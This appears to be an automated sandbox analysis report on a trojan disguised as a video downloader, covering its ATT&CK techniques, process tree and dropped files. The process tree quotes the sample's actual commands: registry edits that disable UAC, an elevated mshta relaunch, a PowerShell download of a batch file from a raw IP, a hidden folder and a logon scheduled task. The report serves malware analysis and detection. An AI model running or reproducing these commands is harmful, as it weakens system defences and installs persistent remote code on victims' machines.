2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

Analysis

max time kernel
147s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
28-09-2024 11:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

pornhub_downloader.2.exe
Size

88KB
MD5

759f5a6e3daa4972d43bd4a5edbdeb11
SHA1

36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256

2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512

f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
SSDEEP

1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Score

10^/10

defense_evasion discovery evasion execution privilege_escalation trojan

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	1956	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1956	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
5000	attrib.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	pornhub_downloader.2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	PORNHU~1.EXE

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
2024	mshta.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PORNHU~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pornhub_downloader.2.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4280	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1956	powershell.exe
1956	powershell.exe
1852	msedge.exe
1852	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
4776	identity_helper.exe
4776	identity_helper.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe
4200	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1956	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe
2148	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3016 wrote to memory of 4180	3016	pornhub_downloader.2.exe	82
PID 3016 wrote to memory of 4180	3016	pornhub_downloader.2.exe	82
PID 4180 wrote to memory of 2024	4180	cmd.exe	85
PID 4180 wrote to memory of 2024	4180	cmd.exe	85
PID 2024 wrote to memory of 912	2024	mshta.exe	86
PID 2024 wrote to memory of 912	2024	mshta.exe	86
PID 2024 wrote to memory of 912	2024	mshta.exe	86
PID 912 wrote to memory of 2924	912	PORNHU~1.EXE	87
PID 912 wrote to memory of 2924	912	PORNHU~1.EXE	87
PID 2924 wrote to memory of 2252	2924	cmd.exe	89
PID 2924 wrote to memory of 2252	2924	cmd.exe	89
PID 2924 wrote to memory of 5012	2924	cmd.exe	90
PID 2924 wrote to memory of 5012	2924	cmd.exe	90
PID 2924 wrote to memory of 2616	2924	cmd.exe	91
PID 2924 wrote to memory of 2616	2924	cmd.exe	91
PID 2924 wrote to memory of 1820	2924	cmd.exe	92
PID 2924 wrote to memory of 1820	2924	cmd.exe	92
PID 1820 wrote to memory of 4040	1820	cmd.exe	93
PID 1820 wrote to memory of 4040	1820	cmd.exe	93
PID 2924 wrote to memory of 2148	2924	cmd.exe	94
PID 2924 wrote to memory of 2148	2924	cmd.exe	94
PID 2924 wrote to memory of 5000	2924	cmd.exe	95
PID 2924 wrote to memory of 5000	2924	cmd.exe	95
PID 2148 wrote to memory of 4084	2148	msedge.exe	96
PID 2148 wrote to memory of 4084	2148	msedge.exe	96
PID 2924 wrote to memory of 1956	2924	cmd.exe	97
PID 2924 wrote to memory of 1956	2924	cmd.exe	97
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98
PID 2148 wrote to memory of 5084	2148	msedge.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5000	attrib.exe

C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.2.exe
"C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.2.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\63CB.tmp\63CC.tmp\63CD.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.2.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Windows\system32\mshta.exe
    mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
    3⤵
    - Checks computer location settings
    - Access Token Manipulation: Create Process with Token
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:912
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6726.tmp\6727.tmp\6728.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2924
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:2252
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:5012
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:2616
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1820
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        7⤵
        
        PID:4040
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6a2a46f8,0x7ffc6a2a4708,0x7ffc6a2a4718
        7⤵
        
        PID:4084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
        7⤵
        
        PID:5084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
        7⤵
        
        PID:1880
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        7⤵
        
        PID:1040
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
        7⤵
        
        PID:760
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
        7⤵
        
        PID:2304
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
        7⤵
        
        PID:1360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4776
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
        7⤵
        
        PID:4444
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
        7⤵
        
        PID:4976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
        7⤵
        
        PID:1588
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
        7⤵
        
        PID:5000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,12268693132720773445,3480228127181207782,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1816 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4200
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5000
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1956
      - C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
983cbc1f706a155d63496ebc4d66515e

SHA1
223d0071718b80cad9239e58c5e8e64df6e2a2fe

SHA256
cc34b8f8e3f4bfe4c9a227d88f56ea2dd276ca3ac81df622ff5e9a8ec46b951c

SHA512
d9cf2ca46d9379902730c81e615a3eb694873ffd535c6bb3ded2dc97cdbbfb71051ab11a07754ed6f610f04285605b702b5a48a6cfda3ee3287230c41c9c45cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
111c361619c017b5d09a13a56938bd54

SHA1
e02b363a8ceb95751623f25025a9299a2c931e07

SHA256
d7be4042a1e3511b0dbf0ab5c493245e4ac314440a4ae0732813db01a21ef8bc

SHA512
fc16a4ad0b56899b82d05114d7b0ca8ee610cdba6ff0b6a67dea44faf17b3105109335359b78c0a59c9011a13152744a7f5d4f6a5b66ea519df750ef03f622b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
816B

MD5
c0514d07022e4ba236fe5eac17f37173

SHA1
a160d4dc72fa16009ae6bacd0ac6d97744d5b529

SHA256
cabd24a318ac4fb6c6cdc70ef577880f073303d49274d5de02a907ae3cc0ac21

SHA512
4df3724b78fab3b5a2b13e1616734f19925c271d1a1b76b46dd5c250b004e8cfbfdccab36687d350645aafecbe27b78084470fa1ad795678fc47cfde5125bc0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
def2c8ae1b5d5ae7f8d508c90e8db027

SHA1
237f0a223bb79cfa5585fd8bad172318ad2b41e4

SHA256
4eb97852fdaf3719ba9ee67dfcfc4427da230649fd3208e8812c214d461614e9

SHA512
a308fea39f746ce8e9e0ba998fe3f8a4c7da4bed59db29714aa776b425c9d46014b25c2d996b34c22efaf99ab03396309369b02c51a54fef36cf4605d366714c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
cded762712fa65e5ce8f92128460b0cc

SHA1
fb1695879d301b99a0f8ad010f716f15067eb298

SHA256
bf96078ef0771c08e0de5f4c9ff5f809de0cc7adb7050468983165f3653b2f96

SHA512
83fc7df9cf5e9add04f200fe9fa7ec655dd0fa997f713f3a5c9e19e0e9d5ec58613a67347cf7e12c1d3efd7400f410c64f48c1f7966a9e3b2567369151da2437

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
3b9a51571fb1318381c1c11bd0be8613

SHA1
ce6437111632c8c4085dc542d29157c69a84b4b2

SHA256
23fcc472922bfa5e885182ef747562ca7dcea6cb2529ad3dea8553df821da1e3

SHA512
29e361060bdf854d2f0b4523d1e77c94f91eb83b33f57a1bd58236d5bb0fd98554ba733b2f9273f2297e9cf33c4733f6e125382aa9c25f89688d9aa92cc607ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
e2536b0d0edb2f54bba4227709b1b8b1

SHA1
82504706e2ef5a14ba8e5e6f2195c551273658c7

SHA256
70287bca302f6ddb2ebaf2b2f3b232d25e2dbe098cf81b4cca7ca6edda748f65

SHA512
4ae599a4c90d1a17cfb2a531b26f17bc031fa0ecee8527a16d14a3b6d90d5b2248b5fee44d17ab7546dafd1414dfcb99eb7f45904b9f3b21161a42734ab41202

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57c488.TMP

Filesize
48B

MD5
48412af81a1b2c06a4873f227a9b0d5d

SHA1
cbd0e2ba2e65e162d3042ee6b70142c6c95ea863

SHA256
f286bca6f9314538fa7e00d72479546d7d9771728800cfab9d01c09785016585

SHA512
1874a4c50bc888902d40876cd9d2e7dae4d0c8d62b8e8cb5a370d36e255f00da28b9ce0c26cd14282fde163ab73f158591533384e1f8febfa748c021383b0028

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
71c6b3cd3c13b442472ba73aec2555cf

SHA1
9dd366e3016fe18af2c7cfdd62b6778e2b4f47aa

SHA256
ae9356d26c7adcb80e2b7b6838b7d5de8d7b9dedfeb058176f34de865ef6e7c9

SHA512
8be2c4bacd1878f39dc1a7a3ce0277cb32e35e3046cdfd3b65a964df53097b69c98dab0205c946e1a8074fddd692900aaf4988dfd1cbd6122eaaa7a7ef4e40ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\63CB.tmp\63CC.tmp\63CD.bat

Filesize
1KB

MD5
9856d2fe29a28c54c5943c2150f7bae1

SHA1
f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

SHA256
0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

SHA512
002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_roxmoijw.exh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1956-21-0x0000023AA0220000-0x0000023AA0242000-memory.dmp

Filesize
136KB

Download